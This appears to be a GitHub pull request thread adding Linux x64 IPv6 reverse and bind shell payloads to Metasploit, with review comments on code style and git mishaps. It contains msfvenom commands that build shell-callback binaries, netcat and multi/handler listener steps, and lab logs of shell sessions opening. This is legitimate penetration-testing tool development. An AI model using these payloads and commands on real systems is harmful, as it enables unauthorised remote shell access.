Add linux x64 ipv6 reverse shell

[epi052]

Implements inline x86_64 Linux reverse bourne shell over IPv6.

Verification

List the steps needed to make sure this thing works

• Select IPv6 address ifconfig ...
• Build executable ./msfvenom -p linux/x64/shell_reverse_ipv6_tcp LHOST='dead:beef:2::1009' -f elf -o test.elf
• Start an IPv6 netcat listener nc -nvl6p 4444
• Run binary ./test.elf
• Run command to test shell works id

connect syscall to view sockaddr_in6 struct

Demonstration

Create elf and upload to remote machine

Start listener and catch callback

[sempervictus]

Any chance you could implement via metasm in lib? Makes for much more reusable shellcode.
Thanks for pushing this.

[epi052]

I looked through the other payloads for examples. Are you asking for something similar to
metasploit-framework/modules/payloads/stages/linux/x64/meterpreter.rb?

All of the payloads I could find appear to have the assembly as a string, then a call to Metasm::Shellcode.assemble

Is that all you're looking for?

[OJ]

Take a look in lib/MSF/core/payload for lots of examples. And yes, that's exactly what we're looking for. Thank you!

…

On Tue., 4 Dec. 2018, 22:35 epi052 ***@***.*** wrote: I looked through the other payloads for examples. Are you asking for something similar to metasploit-framework/modules/payloads/stages/linux/x64/meterpreter.rb? All of the payloads I could find appear to have the assembly as a string, then a call to Metasm::Shellcode.assemble Is that all you're looking for? — You are receiving this because you are subscribed to this thread. Reply to this email directly, view it on GitHub <#11039 (comment)>, or mute the thread <https://github.com/notifications/unsubscribe-auth/AABw4CWV-VGCENZ950W49Ck_x_VuAg6oks5u1mwHgaJpZM4Y5hFQ> .

[epi052]

Finished the bind shell. Mind taking a look at that before I do the reverse?

[epi052]

Both ipv6 payloads should be good to go.

[busterb]

We probably don't need this in this PR.

[sempervictus]

Isn't pry already part of MSF? Or is that just a dev group thing?

[epi052]

I worked myself into a detached head state as far as git is concerned. Had never seen that and googled how to get the work I'd done back into the proper branch. The fix action snuck this little guy in. I never explicitly git added the Gemfile, however it got included and I didn't realize. I'll get it out of the PR shortly. Sorry about that.

[epi052]

Removed the modified Gemfile.

[wchen-r7]

forgot something?

[epi052]

It appears so. I removed it from this branch/pull request. It looks like I need to go to git school... I clearly jacked something up. I wanted the two pull requests to be separate branches and separate work. However, it didn't work out that way. I'm sure it was user-error on my part. Thanks for checking it over.

I ended up getting both bind payloads in both branches exactly the same. Sorry again for the confusion.

[epi052]

Along the same lines, what should I do about the other PR, since this one has both payloads anyway?

[bwatters-r7]

We could close the other, or fix this one. Closing the other would likely be easier, but it is up to you.

[epi052]

Closed the other PR. Please let me know if anything else is needed on my end.

[epi052]

I know you all have been doing great things getting MSF 5.0 out and obviously been busy. Just wanted to check in and see if there was anything I still needed to do for this. Thanks!

[bwatters-r7]

tmoose@ubuntu:~/rapid7/metasploit-framework$ ./msfvenom -p linux/x64/shell_reverse_ipv6_tcp -o revtcp_shell_ipv6.elf -f elf LHOST=fd34:fe56:7891:2f3a:eca2:a4dc:58c7:b176 LPORT=4567
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 90 bytes
Final size of elf file: 210 bytes
Saved as: revtcp_shell_ipv6.elf

On branch land-11039
nothing to commit, working directory clean
msf5 exploit(multi/handler) > set payload linux/x64/shell_reverse_ipv6_tcp
payload => linux/x64/shell_reverse_ipv6_tcp
msf5 exploit(multi/handler) > set lhost fd34:fe56:7891:2f3a:eca2:a4dc:58c7:b176
lhost => fd34:fe56:7891:2f3a:eca2:a4dc:58c7:b176
msf5 exploit(multi/handler) > set lport 4567
lport => 4567
msf5 exploit(multi/handler) > run

[*] Started reverse TCP handler on fd34:fe56:7891:2f3a:eca2:a4dc:58c7:b176:4567 
[*] Command shell session 1 opened (fd34:fe56:7891:2f3a:eca2:a4dc:58c7:b176:4567 -> fd34:fe56:7891:2f3b:e5bf:bfc3:683c:74ee:57284) at 2019-02-01 11:34:40 -0600

id
uid=1000(msfuser) gid=1000(msfuser) groups=1000(msfuser),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),116(lpadmin),126(sambashare)
pwd
/home/msfuser
ifconfig
ens32: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.134.159  netmask 255.255.255.0  broadcast 192.168.134.255
        inet6 fd34:fe56:7891:2f3b:f533:e23e:76b8:b9be  prefixlen 64  scopeid 0x0<global>
        inet6 fe80::fdb9:5fa4:bd3a:780c  prefixlen 64  scopeid 0x20<link>
        inet6 fd34:fe56:7891:2f3b:e5bf:bfc3:683c:74ee  prefixlen 64  scopeid 0x0<global>
        ether 00:0c:29:08:11:58  txqueuelen 1000  (Ethernet)
        RX packets 192837  bytes 284112864 (284.1 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 117283  bytes 9710710 (9.7 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 373  bytes 29862 (29.8 KB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 373  bytes 29862 (29.8 KB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

[bwatters-r7]

rapid7/metasploit-framework$ ./msfvenom -p linux/x64/shell_bind_ipv6_tcp -o bindtcp_shell_ipv6.elf -f elf LPORT=4567

msf5 exploit(multi/handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (linux/x64/shell_bind_ipv6_tcp):

   Name   Current Setting                          Required  Description
   ----   ---------------                          --------  -----------
   LPORT  4567                                     yes       The listen port
   RHOST  fd34:fe56:7891:2f3b:f533:e23e:76b8:b9be  no        The target address


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf5 exploit(multi/handler) > run

[*] Started bind TCP handler against fd34:fe56:7891:2f3b:f533:e23e:76b8:b9be:4567
[*] Command shell session 4 opened (fd34:fe56:7891:2f3a:eca2:a4dc:58c7:b176:39182 -> fd34:fe56:7891:2f3b:f533:e23e:76b8:b9be:4567) at 2019-02-01 15:50:15 -0600

id
uid=1000(msfuser) gid=1000(msfuser) groups=1000(msfuser),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),116(lpadmin),126(sambashare)
pwd
/home/msfuser
exit
[*] fd34:fe56:7891:2f3b:f533:e23e:76b8:b9be - Command shell session 4 closed.

[bwatters-r7]

Release Notes

This adds Linux x86_64 IPv6 bind and reverse shell payloads to the framework.